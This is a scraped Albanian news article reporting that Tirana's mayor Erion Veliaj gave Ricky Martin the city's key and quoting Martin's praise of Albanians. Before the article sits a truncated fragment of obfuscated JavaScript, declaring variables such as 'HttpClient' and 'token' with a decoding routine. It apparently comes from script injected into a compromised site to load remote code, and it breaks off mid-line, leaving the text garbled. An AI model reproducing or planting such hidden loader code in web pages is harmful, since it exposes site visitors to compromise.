;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Tiranë: Ricky Martin nderohet nga Veliaj, “Do të flas për shqiptarët kudo që shkoj”

By

Sonte, Ricky Martin do të jap koncert në Sheshin “Skënderbej”, dhe kryetari i Bashkisë së Tiranës, Erion Veliaj, priti në zyrën e tij këngëtarin me famë botërore, Ricky Martin, të cilit në shenjë mirë se ardhje i dhuroi “Çelësin e Qytetit”.

Ndërsa këngëtari i famshëm Ricky Martin falënderoi krye bashkiakun Veliaj për mikpritjen dhe tha se do flasë për shqiptarët dhe energjinë e tyre pozitive kudo.

“Surprizë pas surprize. Jam super falenderues për ftesën. Është surprizë e madhe t’ju takoj. U ndjeva si në shtëpi që në momentin që erdha këtu. Do e marr me vete shpirtin e shqiptarëve dhe do të flas për shqiptarët kudo që do shkoj sepse është fantastike të jesh këtu. Sonte do ta shkëmbejmë këtë energji mes audiencës dhe asaj që ne sjellim nga Puerto Rico, që është pasion, dashuri, ndershmëri, transparencë. Do të jetë shumë speciale!”, u shpreh këngëtari Ricky Martin. /Prive.al

Artikuj të ngjashëm